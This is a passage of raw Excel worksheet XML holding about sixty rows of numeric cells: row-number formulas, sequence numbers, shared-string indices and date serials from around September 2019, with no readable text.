        <v>19993</v>
      </c>
    </row>
    <row r="10259" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10259">
        <f t="shared" si="160"/>
        <v>10258</v>
      </c>
      <c r="B10259">
        <v>258</v>
      </c>
      <c r="C10259" t="s">
        <v>19637</v>
      </c>
      <c r="D10259" s="1">
        <v>43715</v>
      </c>
      <c r="E10259" t="s">
        <v>19994</v>
      </c>
      <c r="F10259" t="s">
        <v>10021</v>
      </c>
      <c r="G10259" t="s">
        <v>19995</v>
      </c>
    </row>
    <row r="10260" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10260">
        <f t="shared" si="160"/>
        <v>10259</v>
      </c>
      <c r="B10260">
        <v>259</v>
      </c>
      <c r="C10260" t="s">
        <v>19637</v>
      </c>
      <c r="D10260" s="1">
        <v>43719</v>
      </c>
      <c r="E10260" t="s">
        <v>19650</v>
      </c>
      <c r="F10260" t="s">
        <v>10021</v>
      </c>
      <c r="G10260" t="s">
        <v>19996</v>
      </c>
    </row>
    <row r="10261" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10261">
        <f t="shared" si="160"/>
        <v>10260</v>
      </c>
      <c r="B10261">
        <v>260</v>
      </c>
      <c r="C10261" t="s">
        <v>19637</v>
      </c>
      <c r="D10261" s="1">
        <v>43731</v>
      </c>
      <c r="E10261" t="s">
        <v>19717</v>
      </c>
      <c r="F10261" t="s">
        <v>10526</v>
      </c>
      <c r="G10261" t="s">
        <v>19997</v>
      </c>
    </row>
    <row r="10262" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10262">
        <f t="shared" si="160"/>
        <v>10261</v>
      </c>
      <c r="B10262">
        <v>261</v>
      </c>
      <c r="C10262" t="s">
        <v>19637</v>
      </c>
      <c r="D10262" s="1">
        <v>43735</v>
      </c>
      <c r="E10262" t="s">
        <v>19640</v>
      </c>
      <c r="F10262" t="s">
        <v>10526</v>
      </c>
      <c r="G10262" t="s">
        <v>19998</v>
      </c>
    </row>
    <row r="10263" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10263">
        <f t="shared" si="160"/>
        <v>10262</v>
      </c>
      <c r="B10263">
        <v>262</v>
      </c>
      <c r="C10263" t="s">
        <v>19637</v>
      </c>
      <c r="D10263" s="1">
        <v>43714</v>
      </c>
      <c r="F10263" t="s">
        <v>10526</v>
      </c>
      <c r="G10263" t="s">
        <v>19999</v>
      </c>
    </row>
    <row r="10264" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10264">
        <f t="shared" si="160"/>
        <v>10263</v>
      </c>
      <c r="B10264">
        <v>263</v>
      </c>
      <c r="C10264" t="s">
        <v>19637</v>
      </c>
      <c r="D10264" s="1">
        <v>43719</v>
      </c>
      <c r="E10264" t="s">
        <v>19750</v>
      </c>
      <c r="F10264" t="s">
        <v>9978</v>
      </c>
      <c r="G10264" t="s">
        <v>20000</v>
      </c>
    </row>
    <row r="10265" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10265">
        <f t="shared" si="160"/>
        <v>10264</v>
      </c>
      <c r="B10265">
        <v>264</v>
      </c>
      <c r="C10265" t="s">
        <v>19637</v>
      </c>
      <c r="D10265" s="1">
        <v>43726</v>
      </c>
      <c r="E10265" t="s">
        <v>20001</v>
      </c>
      <c r="F10265" t="s">
        <v>10526</v>
      </c>
      <c r="G10265" t="s">
        <v>20002</v>
      </c>
    </row>
    <row r="10266" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10266">
        <f t="shared" si="160"/>
        <v>10265</v>
      </c>
      <c r="B10266">
        <v>265</v>
      </c>
      <c r="C10266" t="s">
        <v>19637</v>
      </c>
      <c r="D10266" s="1">
        <v>43719</v>
      </c>
      <c r="E10266" t="s">
        <v>19640</v>
      </c>
      <c r="F10266" t="s">
        <v>10021</v>
      </c>
      <c r="G10266" t="s">
        <v>20003</v>
      </c>
    </row>
    <row r="10267" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10267">
        <f t="shared" si="160"/>
        <v>10266</v>
      </c>
      <c r="B10267">
        <v>266</v>
      </c>
      <c r="C10267" t="s">
        <v>19637</v>
      </c>
      <c r="D10267" s="1">
        <v>43730</v>
      </c>
      <c r="E10267" t="s">
        <v>19640</v>
      </c>
      <c r="F10267" t="s">
        <v>10021</v>
      </c>
      <c r="G10267" t="s">
        <v>20004</v>
      </c>
    </row>
    <row r="10268" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10268">
        <f t="shared" si="160"/>
        <v>10267</v>
      </c>
      <c r="B10268">
        <v>267</v>
      </c>
      <c r="C10268" t="s">
        <v>19637</v>
      </c>
      <c r="D10268" s="1">
        <v>43712</v>
      </c>
      <c r="E10268" t="s">
        <v>20005</v>
      </c>
      <c r="F10268" t="s">
        <v>9975</v>
      </c>
      <c r="G10268" t="s">
        <v>20006</v>
      </c>
    </row>
    <row r="10269" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10269">
        <f t="shared" si="160"/>
        <v>10268</v>
      </c>
      <c r="B10269">
        <v>268</v>
      </c>
      <c r="C10269" t="s">
        <v>19637</v>
      </c>
      <c r="D10269" s="1">
        <v>43723</v>
      </c>
      <c r="F10269" t="s">
        <v>10526</v>
      </c>
      <c r="G10269" t="s">
        <v>20007</v>
      </c>
    </row>
    <row r="10270" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10270">
        <f t="shared" si="160"/>
        <v>10269</v>
      </c>
      <c r="B10270">
        <v>269</v>
      </c>
      <c r="C10270" t="s">
        <v>19637</v>
      </c>
      <c r="D10270" s="1">
        <v>43735</v>
      </c>
      <c r="E10270" t="s">
        <v>19680</v>
      </c>
      <c r="F10270" t="s">
        <v>10021</v>
      </c>
      <c r="G10270" t="s">
        <v>20008</v>
      </c>
    </row>
    <row r="10271" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10271">
        <f t="shared" si="160"/>
        <v>10270</v>
      </c>
      <c r="B10271">
        <v>270</v>
      </c>
      <c r="C10271" t="s">
        <v>19637</v>
      </c>
      <c r="D10271" s="1">
        <v>43718</v>
      </c>
      <c r="E10271" t="s">
        <v>20009</v>
      </c>
      <c r="F10271" t="s">
        <v>10021</v>
      </c>
      <c r="G10271" t="s">
        <v>20010</v>
      </c>
    </row>
    <row r="10272" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10272">
        <f t="shared" si="160"/>
        <v>10271</v>
      </c>
      <c r="B10272">
        <v>271</v>
      </c>
      <c r="C10272" t="s">
        <v>19637</v>
      </c>
      <c r="D10272" s="1">
        <v>43711</v>
      </c>
      <c r="F10272" t="s">
        <v>10526</v>
      </c>
      <c r="G10272" t="s">
        <v>20011</v>
      </c>
    </row>
    <row r="10273" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10273">
        <f t="shared" si="160"/>
        <v>10272</v>
      </c>
      <c r="B10273">
        <v>272</v>
      </c>
      <c r="C10273" t="s">
        <v>19637</v>
      </c>
      <c r="D10273" s="1">
        <v>43735</v>
      </c>
      <c r="E10273" t="s">
        <v>19640</v>
      </c>
      <c r="F10273" t="s">
        <v>9975</v>
      </c>
      <c r="G10273" t="s">
        <v>20012</v>
      </c>
    </row>
    <row r="10274" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10274">
        <f t="shared" si="160"/>
        <v>10273</v>
      </c>
      <c r="B10274">
        <v>273</v>
      </c>
      <c r="C10274" t="s">
        <v>19637</v>
      </c>
      <c r="D10274" s="1">
        <v>43710</v>
      </c>
      <c r="E10274" t="s">
        <v>19640</v>
      </c>
      <c r="F10274" t="s">
        <v>9975</v>
      </c>
      <c r="G10274" t="s">
        <v>20013</v>
      </c>
    </row>
    <row r="10275" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10275">
        <f t="shared" si="160"/>
        <v>10274</v>
      </c>
      <c r="B10275">
        <v>274</v>
      </c>
      <c r="C10275" t="s">
        <v>19637</v>
      </c>
      <c r="D10275" s="1">
        <v>43729</v>
      </c>
      <c r="F10275" t="s">
        <v>10526</v>
      </c>
      <c r="G10275" t="s">
        <v>20014</v>
      </c>
    </row>
    <row r="10276" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10276">
        <f t="shared" si="160"/>
        <v>10275</v>
      </c>
      <c r="B10276">
        <v>275</v>
      </c>
      <c r="C10276" t="s">
        <v>19637</v>
      </c>
      <c r="D10276" s="1">
        <v>43728</v>
      </c>
      <c r="E10276" t="s">
        <v>19672</v>
      </c>
      <c r="F10276" t="s">
        <v>10021</v>
      </c>
      <c r="G10276" t="s">
        <v>20015</v>
      </c>
    </row>
    <row r="10277" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10277">
        <f t="shared" si="160"/>
        <v>10276</v>
      </c>
      <c r="B10277">
        <v>276</v>
      </c>
      <c r="C10277" t="s">
        <v>19637</v>
      </c>
      <c r="D10277" s="1">
        <v>43717</v>
      </c>
      <c r="E10277" t="s">
        <v>19680</v>
      </c>
      <c r="F10277" t="s">
        <v>10021</v>
      </c>
      <c r="G10277" t="s">
        <v>20016</v>
      </c>
    </row>
    <row r="10278" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10278">
        <f t="shared" si="160"/>
        <v>10277</v>
      </c>
      <c r="B10278">
        <v>277</v>
      </c>
      <c r="C10278" t="s">
        <v>19637</v>
      </c>
      <c r="D10278" s="1">
        <v>43729</v>
      </c>
      <c r="E10278" t="s">
        <v>19640</v>
      </c>
      <c r="F10278" t="s">
        <v>9975</v>
      </c>
      <c r="G10278" t="s">
        <v>20017</v>
      </c>
    </row>
    <row r="10279" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10279">
        <f t="shared" si="160"/>
        <v>10278</v>
      </c>
      <c r="B10279">
        <v>278</v>
      </c>
      <c r="C10279" t="s">
        <v>19637</v>
      </c>
      <c r="D10279" s="1">
        <v>43731</v>
      </c>
      <c r="E10279" t="s">
        <v>19717</v>
      </c>
      <c r="F10279" t="s">
        <v>10526</v>
      </c>
      <c r="G10279" t="s">
        <v>20018</v>
      </c>
    </row>
    <row r="10280" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10280">
        <f t="shared" si="160"/>
        <v>10279</v>
      </c>
      <c r="B10280">
        <v>279</v>
      </c>
      <c r="C10280" t="s">
        <v>19637</v>
      </c>
      <c r="D10280" s="1">
        <v>43726</v>
      </c>
      <c r="E10280" t="s">
        <v>20019</v>
      </c>
      <c r="F10280" t="s">
        <v>10526</v>
      </c>
      <c r="G10280" t="s">
        <v>20020</v>
      </c>
    </row>
    <row r="10281" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10281">
        <f t="shared" si="160"/>
        <v>10280</v>
      </c>
      <c r="B10281">
        <v>280</v>
      </c>
      <c r="C10281" t="s">
        <v>19637</v>
      </c>
      <c r="D10281" s="1">
        <v>43718</v>
      </c>
      <c r="E10281" t="s">
        <v>20021</v>
      </c>
      <c r="F10281" t="s">
        <v>10526</v>
      </c>
      <c r="G10281" t="s">
        <v>20022</v>
      </c>
    </row>
    <row r="10282" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10282">
        <f t="shared" si="160"/>
        <v>10281</v>
      </c>
      <c r="B10282">
        <v>281</v>
      </c>
      <c r="C10282" t="s">
        <v>19637</v>
      </c>
      <c r="D10282" s="1">
        <v>43718</v>
      </c>
      <c r="E10282" t="s">
        <v>19640</v>
      </c>
      <c r="F10282" t="s">
        <v>9975</v>
      </c>
      <c r="G10282" t="s">
        <v>20023</v>
      </c>
    </row>
    <row r="10283" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10283">
        <f t="shared" si="160"/>
        <v>10282</v>
      </c>
      <c r="B10283">
        <v>282</v>
      </c>
      <c r="C10283" t="s">
        <v>19637</v>
      </c>
      <c r="D10283" s="1">
        <v>43713</v>
      </c>
      <c r="E10283" t="s">
        <v>20024</v>
      </c>
      <c r="F10283" t="s">
        <v>10526</v>
      </c>
      <c r="G10283" t="s">
        <v>20025</v>
      </c>
    </row>
    <row r="10284" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10284">
        <f t="shared" si="160"/>
        <v>10283</v>
      </c>
      <c r="B10284">
        <v>283</v>
      </c>
      <c r="C10284" t="s">
        <v>19637</v>
      </c>
      <c r="D10284" s="1">
        <v>43737</v>
      </c>
      <c r="E10284" t="s">
        <v>19680</v>
      </c>
      <c r="F10284" t="s">
        <v>10021</v>
      </c>
      <c r="G10284" t="s">
        <v>20026</v>
      </c>
    </row>
    <row r="10285" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10285">
        <f t="shared" si="160"/>
        <v>10284</v>
      </c>
      <c r="B10285">
        <v>284</v>
      </c>
      <c r="C10285" t="s">
        <v>19637</v>
      </c>
      <c r="D10285" s="1">
        <v>43721</v>
      </c>
      <c r="F10285" t="s">
        <v>10526</v>
      </c>
      <c r="G10285" t="s">
        <v>20027</v>
      </c>
    </row>
    <row r="10286" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10286">
        <f t="shared" si="160"/>
        <v>10285</v>
      </c>
      <c r="B10286">
        <v>285</v>
      </c>
      <c r="C10286" t="s">
        <v>19637</v>
      </c>
      <c r="D10286" s="1">
        <v>43728</v>
      </c>
      <c r="E10286" t="s">
        <v>19896</v>
      </c>
      <c r="F10286" t="s">
        <v>10021</v>
      </c>
      <c r="G10286" t="s">
        <v>20028</v>
      </c>
    </row>
    <row r="10287" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10287">
        <f t="shared" si="160"/>
        <v>10286</v>
      </c>
      <c r="B10287">
        <v>286</v>
      </c>
      <c r="C10287" t="s">
        <v>19637</v>
      </c>
      <c r="D10287" s="1">
        <v>43724</v>
      </c>
      <c r="E10287" t="s">
        <v>20029</v>
      </c>
      <c r="F10287" t="s">
        <v>9978</v>
      </c>
      <c r="G10287" t="s">
        <v>20030</v>
      </c>
    </row>
    <row r="10288" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10288">
        <f t="shared" si="160"/>
        <v>10287</v>
      </c>
      <c r="B10288">
        <v>287</v>
      </c>
      <c r="C10288" t="s">
        <v>19637</v>
      </c>
      <c r="D10288" s="1">
        <v>43712</v>
      </c>
      <c r="F10288" t="s">
        <v>9978</v>
      </c>
      <c r="G10288" t="s">
        <v>20031</v>
      </c>
    </row>
    <row r="10289" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10289">
        <f t="shared" si="160"/>
        <v>10288</v>
      </c>
      <c r="B10289">
        <v>288</v>
      </c>
      <c r="C10289" t="s">
        <v>19637</v>
      </c>
      <c r="D10289" s="1">
        <v>43714</v>
      </c>
      <c r="E10289" t="s">
        <v>20032</v>
      </c>
      <c r="F10289" t="s">
        <v>10021</v>
      </c>
      <c r="G10289" t="s">
        <v>20033</v>
      </c>
    </row>
    <row r="10290" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10290">
        <f t="shared" si="160"/>
        <v>10289</v>
      </c>
      <c r="B10290">
        <v>289</v>
      </c>
      <c r="C10290" t="s">
        <v>19637</v>
      </c>
      <c r="D10290" s="1">
        <v>43714</v>
      </c>
      <c r="E10290" t="s">
        <v>20034</v>
      </c>
      <c r="F10290" t="s">
        <v>10021</v>
      </c>
      <c r="G10290" t="s">
        <v>20035</v>
      </c>
    </row>
    <row r="10291" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10291">
        <f t="shared" si="160"/>
        <v>10290</v>
      </c>
      <c r="B10291">
        <v>290</v>
      </c>
      <c r="C10291" t="s">
        <v>19637</v>
      </c>
      <c r="D10291" s="1">
        <v>43735</v>
      </c>
      <c r="E10291" t="s">
        <v>19648</v>
      </c>
      <c r="F10291" t="s">
        <v>10021</v>
      </c>
      <c r="G10291" t="s">
        <v>20036</v>
      </c>
    </row>
    <row r="10292" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10292">
        <f t="shared" si="160"/>
        <v>10291</v>
      </c>
      <c r="B10292">
        <v>291</v>
      </c>
      <c r="C10292" t="s">
        <v>19637</v>
      </c>
      <c r="D10292" s="1">
        <v>43734</v>
      </c>
      <c r="E10292" t="s">
        <v>20037</v>
      </c>
      <c r="F10292" t="s">
        <v>10526</v>
      </c>
      <c r="G10292" t="s">
        <v>20038</v>
      </c>
    </row>
    <row r="10293" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10293">
        <f t="shared" si="160"/>
        <v>10292</v>
      </c>
      <c r="B10293">
        <v>292</v>
      </c>
      <c r="C10293" t="s">
        <v>19637</v>
      </c>
      <c r="D10293" s="1">
        <v>43729</v>
      </c>
      <c r="E10293" t="s">
        <v>19640</v>
      </c>
      <c r="F10293" t="s">
        <v>9975</v>
      </c>
      <c r="G10293" t="s">
        <v>20039</v>
      </c>
    </row>
    <row r="10294" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10294">
        <f t="shared" si="160"/>
        <v>10293</v>
      </c>
      <c r="B10294">
        <v>293</v>
      </c>
      <c r="C10294" t="s">
        <v>19637</v>
      </c>
      <c r="D10294" s="1">
        <v>43736</v>
      </c>
      <c r="F10294" t="s">
        <v>9978</v>
      </c>
      <c r="G10294" t="s">
        <v>20040</v>
      </c>
    </row>
    <row r="10295" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10295">
        <f t="shared" si="160"/>
        <v>10294</v>
      </c>
      <c r="B10295">
        <v>294</v>
      </c>
      <c r="C10295" t="s">
        <v>19637</v>
      </c>
      <c r="D10295" s="1">
        <v>43726</v>
      </c>
      <c r="E10295" t="s">
        <v>19680</v>
      </c>
      <c r="F10295" t="s">
        <v>10021</v>
      </c>
      <c r="G10295" t="s">
        <v>20041</v>
      </c>
    </row>
    <row r="10296" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10296">
        <f t="shared" si="160"/>
        <v>10295</v>
      </c>
      <c r="B10296">
        <v>295</v>
      </c>
      <c r="C10296" t="s">
        <v>19637</v>
      </c>
      <c r="D10296" s="1">
        <v>43733</v>
      </c>
      <c r="E10296" t="s">
        <v>19640</v>
      </c>
      <c r="F10296" t="s">
        <v>10021</v>
      </c>
      <c r="G10296" t="s">
        <v>20042</v>
      </c>
    </row>
    <row r="10297" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10297">
        <f t="shared" si="160"/>
        <v>10296</v>
      </c>
      <c r="B10297">
        <v>296</v>
      </c>
      <c r="C10297" t="s">
        <v>19637</v>
      </c>
      <c r="D10297" s="1">
        <v>43714</v>
      </c>
      <c r="E10297" t="s">
        <v>19640</v>
      </c>
      <c r="F10297" t="s">
        <v>10021</v>
      </c>
      <c r="G10297" t="s">
        <v>20043</v>
      </c>
    </row>
    <row r="10298" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10298">
        <f t="shared" si="160"/>
        <v>10297</v>
      </c>
      <c r="B10298">
        <v>297</v>
      </c>
      <c r="C10298" t="s">
        <v>19637</v>
      </c>
      <c r="D10298" s="1">
        <v>43728</v>
      </c>
      <c r="E10298" t="s">
        <v>19640</v>
      </c>
      <c r="F10298" t="s">
        <v>9975</v>
      </c>
      <c r="G10298" t="s">
        <v>19836</v>
      </c>
    </row>
    <row r="10299" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10299">
        <f t="shared" si="160"/>
        <v>10298</v>
      </c>
      <c r="B10299">
        <v>298</v>
      </c>
      <c r="C10299" t="s">
        <v>19637</v>
      </c>
      <c r="D10299" s="1">
        <v>43732</v>
      </c>
      <c r="F10299" t="s">
        <v>10021</v>
      </c>
      <c r="G10299" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="10300" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10300">
        <f t="shared" si="160"/>
        <v>10299</v>
      </c>
      <c r="B10300">
        <v>299</v>
      </c>
      <c r="C10300" t="s">
        <v>19637</v>
      </c>
      <c r="D10300" s="1">
        <v>43721</v>
      </c>
      <c r="E10300" t="s">
        <v>20044</v>
      </c>
      <c r="F10300" t="s">
        <v>10526</v>
      </c>
      <c r="G10300" t="s">
        <v>20045</v>
      </c>
    </row>
    <row r="10301" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10301">
        <f t="shared" si="160"/>
        <v>10300</v>
      </c>
      <c r="B10301">
        <v>300</v>
      </c>
      <c r="C10301" t="s">
        <v>19637</v>
      </c>
      <c r="D10301" s="1">
        <v>43714</v>
      </c>
      <c r="E10301" t="s">
        <v>19879</v>
      </c>
      <c r="F10301" t="s">
        <v>10021</v>
      </c>
      <c r="G10301" t="s">
        <v>20046</v>
      </c>
    </row>
    <row r="10302" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10302">
        <f t="shared" si="160"/>
        <v>10301</v>
      </c>
      <c r="B10302">
        <v>301</v>
      </c>
      <c r="C10302" t="s">
        <v>19637</v>
      </c>
      <c r="D10302" s="1">
        <v>43728</v>
      </c>
      <c r="E10302" t="s">
        <v>20047</v>
      </c>
      <c r="F10302" t="s">
        <v>10526</v>
      </c>
      <c r="G10302" t="s">
        <v>20048</v>
      </c>
    </row>
    <row r="10303" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10303">
        <f t="shared" si="160"/>
        <v>10302</v>
      </c>
      <c r="B10303">
        <v>302</v>
      </c>
      <c r="C10303" t="s">
        <v>19637</v>
      </c>
      <c r="D10303" s="1">
        <v>43737</v>
      </c>
      <c r="E10303" t="s">
        <v>19643</v>
      </c>
      <c r="F10303" t="s">
        <v>10021</v>
      </c>
      <c r="G10303" t="s">
        <v>20049</v>
      </c>
    </row>
    <row r="10304" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10304">
        <f t="shared" si="160"/>
        <v>10303</v>
      </c>
      <c r="B10304">
        <v>303</v>
      </c>
      <c r="C10304" t="s">
        <v>19637</v>
      </c>
      <c r="D10304" s="1">
        <v>43715</v>
      </c>
      <c r="F10304" t="s">
        <v>10526</v>
      </c>
      <c r="G10304" t="s">
        <v>20050</v>
      </c>
    </row>
    <row r="10305" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10305">
        <f t="shared" si="160"/>
        <v>10304</v>
      </c>
      <c r="B10305">
        <v>304</v>
      </c>
      <c r="C10305" t="s">
        <v>19637</v>
      </c>
      <c r="D10305" s="1">
        <v>43720</v>
      </c>
      <c r="E10305" t="s">
        <v>19971</v>
      </c>
      <c r="F10305" t="s">
        <v>9975</v>
      </c>
      <c r="G10305" t="s">
        <v>20051</v>
      </c>
    </row>
    <row r="10306" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10306">
        <f t="shared" si="160"/>
        <v>10305</v>
      </c>
      <c r="B10306">
        <v>305</v>
      </c>
      <c r="C10306" t="s">
        <v>19637</v>
      </c>
      <c r="D10306" s="1">
        <v>43730</v>
      </c>
      <c r="F10306" t="s">
        <v>10526</v>
      </c>
      <c r="G10306" t="s">
        <v>20052</v>
      </c>
    </row>
    <row r="10307" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10307">
        <f t="shared" ref="A10307:A10370" si="161">+ROW(A10306)</f>
        <v>10306</v>
      </c>
      <c r="B10307">
        <v>306</v>
      </c>
      <c r="C10307" t="s">
        <v>19637</v>
      </c>
      <c r="D10307" s="1">
        <v>43711</v>
      </c>
      <c r="F10307" t="s">
        <v>10526</v>
      </c>
      <c r="G10307" t="s">
        <v>20053</v>
      </c>
    </row>
    <row r="10308" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10308">
        <f t="shared" si="161"/>
        <v>10307</v>
      </c>
      <c r="B10308">
        <v>307</v>
      </c>
      <c r="C10308" t="s">
        <v>19637</v>
      </c>
      <c r="D10308" s="1">
        <v>43732</v>
      </c>
      <c r="F10308" t="s">
        <v>10526</v>
      </c>
      <c r="G10308" t="s">
        <v>20054</v>
      </c>
    </row>
    <row r="10309" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10309">
        <f t="shared" si="161"/>
        <v>10308</v>
      </c>
      <c r="B10309">
        <v>308</v>
      </c>
      <c r="C10309" t="s">
        <v>19637</v>
      </c>
      <c r="D10309" s="1">
        <v>43718</v>
      </c>
      <c r="F10309" t="s">
        <v>10526</v>
      </c>
      <c r="G10309" t="s">
        <v>20055</v>
      </c>
    </row>
    <row r="10310" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10310">
        <f t="shared" si="161"/>
        <v>10309</v>
      </c>
      <c r="B10310">
        <v>309</v>
      </c>
      <c r="C10310" t="s">
        <v>19637</v>
      </c>
      <c r="D10310" s="1">
        <v>43735</v>
      </c>
      <c r="E10310" t="s">
        <v>19855</v>
      </c>
      <c r="F10310" t="s">
        <v>9978</v>
      </c>
      <c r="G10310" t="s">
        <v>20056</v>
      </c>
    </row>
    <row r="10311" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10311">
        <f t="shared" si="161"/>
        <v>10310</v>
      </c>
      <c r="B10311">
        <v>310</v>
      </c>
      <c r="C10311" t="s">
        <v>19637</v>
      </c>
      <c r="D10311" s="1">
        <v>43729</v>
      </c>
      <c r="E10311" t="s">
        <v>19648</v>
      </c>
      <c r="F10311" t="s">
        <v>10021</v>
      </c>
      <c r="G10311" t="s">
        <v>20057</v>
      </c>
    </row>
    <row r="10312" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10312">
        <f t="shared" si="161"/>
        <v>10311</v>
      </c>
      <c r="B10312">
        <v>311</v>
      </c>
      <c r="C10312" t="s">
        <v>19637</v>
      </c>
      <c r="D10312" s="1">
        <v>43721</v>
      </c>
      <c r="F10312" t="s">
        <v>10526</v>
      </c>
      <c r="G10312" t="s">
        <v>20058</v>
      </c>
    </row>
    <row r="10313" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10313">
        <f t="shared" si="161"/>
        <v>10312</v>
      </c>
      <c r="B10313">
        <v>312</v>
      </c>
      <c r="C10313" t="s">
        <v>19637</v>
      </c>
      <c r="D10313" s="1">
        <v>43718</v>
      </c>
      <c r="E10313" t="s">
        <v>19680</v>
      </c>
      <c r="F10313" t="s">
        <v>10021</v>
      </c>
      <c r="G10313" t="s">
        <v>20059</v>
      </c>
    </row>
    <row r="10314" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10314">
        <f t="shared" si="161"/>
        <v>10313</v>
      </c>
      <c r="B10314">
        <v>313</v>
      </c>
      <c r="C10314" t="s">
        <v>19637</v>
      </c>
      <c r="D10314" s="1">
        <v>43731</v>
      </c>
      <c r="F10314" t="s">
        <v>10526</v>
      </c>
      <c r="G10314" t="s">
        <v>20060</v>
      </c>
    </row>
    <row r="10315" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10315">
        <f t="shared" si="161"/>
        <v>10314</v>
      </c>
      <c r="B10315">
        <v>314</v>
      </c>
      <c r="C10315" t="s">
        <v>19637</v>
      </c>
      <c r="D10315" s="1">
        <v>43724</v>
      </c>
      <c r="F10315" t="s">
        <v>10526</v>
      </c>
      <c r="G10315" t="s">
        <v>20061</v>
      </c>
    </row>
    <row r="10316" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10316">
        <f t="shared" si="161"/>
        <v>10315</v>
      </c>
      <c r="B10316">
        <v>315</v>
      </c>
      <c r="C10316" t="s">
        <v>19637</v>
      </c>
      <c r="D10316" s="1">
        <v>43729</v>
      </c>
      <c r="F10316" t="s">
        <v>10526</v>
      </c>
      <c r="G10316" t="s">
        <v>20062</v>
      </c>
    </row>
    <row r="10317" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10317">
        <f t="shared" si="161"/>
        <v>10316</v>
      </c>
      <c r="B10317">
        <v>316</v>
      </c>
      <c r="C10317" t="s">
        <v>19637</v>
      </c>
      <c r="D10317" s="1">
        <v>43731</v>
      </c>
      <c r="E10317" t="s">
        <v>20063</v>
      </c>
      <c r="F10317" t="s">
        <v>10526</v>
      </c>
      <c r="G10317" t="s">
        <v>20064</v>
      </c>
    </row>
    <row r="10318" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10318">
        <f t="shared" si="161"/>
        <v>10317</v>
      </c>
      <c r="B10318">
        <v>317</v>
      </c>
      <c r="C10318" t="s">
        <v>19637</v>
      </c>
      <c r="D10318" s="1">
        <v>43712</v>
      </c>
      <c r="E10318" t="s">
        <v>19663</v>
      </c>
      <c r="F10318" t="s">
        <v>9975</v>
      </c>
      <c r="G10318" t="s">
        <v>20065</v>
      </c>
    </row>
    <row r="10319" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10319">
        <f t="shared" si="161"/>
        <v>10318</v>
      </c>
      <c r="B10319">
        <v>318</v>
      </c>
      <c r="C10319" t="s">
        <v>19637</v>
      </c>
      <c r="D10319" s="1">
        <v>43718</v>
      </c>
      <c r="E10319" t="s">
        <v>19640</v>
      </c>
      <c r="F10319" t="s">
        <v>10526</v>
      </c>
      <c r="G10319" t="s">
        <v>20066</v>
      </c>
    </row>
    <row r="10320" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10320">
        <f t="shared" si="161"/>
        <v>10319</v>
      </c>
      <c r="B10320">
        <v>319</v>
      </c>
      <c r="C10320" t="s">
        <v>19637</v>
      </c>
      <c r="D10320" s="1">
        <v>43729</v>
      </c>
      <c r="F10320" t="s">
        <v>10526</v>
      </c>
      <c r="G10320" t="s">
        <v>20067</v>
      </c>
    </row>
    <row r="10321" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10321">
        <f t="shared" si="161"/>
        <v>10320</v>
      </c>
      <c r="B10321">
        <v>320</v>
      </c>
      <c r="C10321" t="s">
        <v>19637</v>
      </c>
      <c r="D10321" s="1">
        <v>43710</v>
      </c>
      <c r="E10321" t="s">
        <v>19881</v>
      </c>
      <c r="F10321" t="s">
        <v>9978</v>
      </c>
      <c r="G10321" t="s">
        <v>20068</v>
      </c>
    </row>
    <row r="10322" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10322">
